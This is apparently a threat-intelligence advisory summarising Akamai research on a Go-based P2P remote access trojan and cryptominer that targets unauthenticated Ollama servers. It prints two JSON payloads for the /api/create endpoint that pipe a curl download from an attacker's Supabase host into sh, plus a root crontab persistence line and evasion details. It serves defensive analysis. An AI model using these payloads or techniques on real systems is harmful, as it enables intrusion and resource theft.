# Stealthy P2P Cryptominer Targeting Ollama Endpoints — Custom Go-Based 'vc' RAT/Dropper (Akamai SIRT)

> Akamai SIRT identified a custom Go-based peer-to-peer Remote Access Trojan named 'vc' that operates as a backdoor and cryptominer dropper targeting exposed Ollama LLM endpoints. The attacker abuses the unauthenticated /api/create endpoint on TCP 11434 with malicious Modelfile payloads (RUN and TEMPLATE+exec injection) to pipe a curl|sh installer (i.sh) into the host, dropping a UPX-packed Go binary that runs as the Ollama process owner. The malware uses a custom libp2p stack (WebRTC, QUIC, DTLS, UPnP) to route Monero (XMRig) mining traffic through a decentralized P2P network, eliminating any single C2 IP/domain to block.

- **Published:** 2026-05-21T12:00:00Z
- **Last reviewed:** 2026-05-21T12:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-0553
- **ID:** TL-2026-0553
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Detections:** 9 · **IOCs:** 28 (full data via the Threadlinqs MCP server — Purple tier)

## Description

On 2026-05-21 Akamai's Security Intelligence Response Team (Larry Cashdollar) published forensic analysis of a novel custom Go-based malware family observed attacking the SIRT's purpose-built LLM honeypot. The malware, internally named 'vc', is delivered through abuse of legitimate Ollama Modelfile functionality on internet-exposed Ollama servers (default TCP port 11434, no authentication).

Initial Access: The attacker sends a POST to /api/create with one of two crafted Modelfile payloads. Payload 1 uses the RUN directive to execute a curl-piped-to-shell command at model creation time:

  {"name":"sys_check","modelfile":"FROM scratch\nRUN curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh","stream":false}

Payload 2 uses the TEMPLATE directive combined with the Ollama exec() template helper to achieve the same shell command execution at template render time:

  {"name":"sys_update","modelfile":"FROM scratch\nTEMPLATE \"{{ .Prompt }} {{ exec \\\"curl -sL https://auzhpjmyaqayopaqidmc.supabase.co/storage/v1/object/public/p/i.sh | sh\\\" }}\"","stream":false}

Both payloads cause the Ollama server to download and execute attacker-controlled shell code as the user account running the Ollama process. The download URL is hosted on a public Supabase storage bucket (auzhpjmyaqayopaqidmc.supabase.co), abusing a legitimate cloud service to evade reputation-based blocking.

Installer Script (i.sh): The shell installer is a minimal failover downloader. It writes the next-stage binary to a RAM-disk path /dev/shm/.sys-update, executes it in the background, and never touches conventional persistent filesystems. Failover logic tries curl, then wget, then a Python 3 urllib.request fallback, ensuring delivery on diverse Linux hosts.

The 'vc' Binary: vc is a custom x86 binary written in Go 1.25.7, UPX-packed, with a deliberately falsified UPX header inserted to disrupt automated unpackers and static analyzers. The unpacked binary embeds a full libp2p decentralized networking stack — the same framework used by IPFS and Filecoin — supporting WebRTC, QUIC, DTLS, and UPnP NAT traversal. There is no traditional C2 server; mining traffic and command channels are multiplexed through a global libp2p mesh, where the malware advertises peer ID 12D3KooWGfRjvTvgfV4eXnFWLV26GG7TciWX7ycBiGPnA7ubVmbG and internal node identifier core-node-01.

Execution Chain (seven steps observed by Akamai):
  1) The binary copies itself to /dev/shm/.udev-mesh-node (RAM disk; bypasses disk-based EDR scans).
  2) Drops two additional binaries into RAM: /dev/shm/kworker-main (the 21 MB libp2p P2P proxy) and /dev/shm/kworker-run (a 2.6 MB XMRig Monero miner).
  3) Renames the main process to kworker-main (matches kernel-thread name convention to evade ps inspection).
  4) Starts a local Stratum-style mining proxy on 127.0.0.1:41947, then bridges that proxy through the libp2p mesh to a decentralized mining pool — defeating Stratum-port and pool-IP egress blocks.
  5) Launches XMRig with wallet 42qxWtESb9t1jvteBGCJybRiHB2x6fiMmhmosjUxfDsFUMLtJgYheVUaac2dvHrDfwcogpQFbTz4h2GXkB1rxonqUJQnUyz and a 50% CPU cap to remain below noise thresholds.
  6) Exposes RAT primitives (arbitrary OS command execution) reachable over the libp2p mesh, executing as the Ollama process owner.
  7) Plants a root crontab line for self-healing persistence: */15 * * * * pgrep -x kworker-run || /dev/shm/.udev-mesh-node — relaunching the dropper every 15 minutes if the miner process is missing. Persistence logic is encapsulated in an internal Go function named hydraPersistence.

Defense Evasion Highlights: kworker process masquerade; .udev-mesh-node and .sys-update hidden-file naming; RAM-disk-only execution (no on-disk artifact after i.sh wipes the dropper); fake UPX header; encrypted P2P channel (DTLS); QUIC over UDP/443 blending with normal HTTP/3 egress.

Note on the Underlying Weakness: The Modelfile RUN and TEMPLATE+exec primitives abused here are intended features of the Ollama Modelfile DSL. There is no CVE assigned to the abuse itself; the root cause is internet-exposed Ollama servers bound to 0.0.0.0:11434 without authentication. This same exposure class enabled prior threats including CVE-2024-37032 (ProbLLama, Wiz Research) and the November 2024 Oligo Security cluster (CVE-2024-39719/39720/39721/39722). As of January 2026 (SentinelLABS + Censys) approximately 175,000 unique Ollama instances were exposed worldwide.

## MITRE ATT&CK

- T1190 Exploit Public-Facing Application
- T1059.004 Command and Scripting Interpreter: Unix Shell
- T1059.006 Command and Scripting Interpreter: Python
- T1204 User Execution
- T1053.003 Scheduled Task/Job: Cron
- T1027.002 Obfuscated Files or Information: Software Packing
- T1036.005 Match Legitimate Resource Name or Location
- T1036.003 Rename Legitimate Utilities
- T1070.004 Indicator Removal: File Deletion
- T1140 Deobfuscate/Decode Files or Information
- T1564.001 Hide Artifacts: Hidden Files and Directories
- T1622 Debugger Evasion
- T1620 Reflective Code Loading
- T1057 Process Discovery
- T1071.001 Application Layer Protocol: Web Protocols
- T1090.001 Proxy: Internal Proxy
- T1090.003 Proxy: Multi-hop Proxy
- T1095 Non-Application Layer Protocol
- T1105 Ingress Tool Transfer
- T1573.002 Encrypted Channel: Asymmetric Cryptography
- T1583.006 Acquire Infrastructure: Web Services
- T1588.002 Obtain Capabilities: Tool
- T1496 Resource Hijacking

## Sources

- [Decentralized Threat: Stealthy P2P Cryptominer Targeting Ollama Endpoints](https://www.akamai.com/blog/security-research/2026/may/stealthy-p2p-cryptominer-ollama-endpoints)
- [Probllama: Ollama Remote Code Execution Vulnerability (CVE-2024-37032)](https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032)
- [NVD - CVE-2024-37032](https://nvd.nist.gov/vuln/detail/CVE-2024-37032)
- [More Models, More ProbLLMs — Six Vulnerabilities in Ollama](https://www.oligo.security/blog/more-models-more-probllms)
- [Researchers Find 175,000 Publicly Exposed Ollama AI Servers](https://thehackernews.com/2026/01/researchers-find-175000-publicly.html)
- [Ollama Drama — Investigating the Prevalence of Open Ollama Instances](https://censys.com/blog/ollama-drama-investigating-the-prevalence-of-ollama-open-instances-with-censys/)
- [libp2p — Modular peer-to-peer networking stack](https://libp2p.io/)
- [XMRig — Monero CPU miner](https://github.com/xmrig/xmrig)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-0553
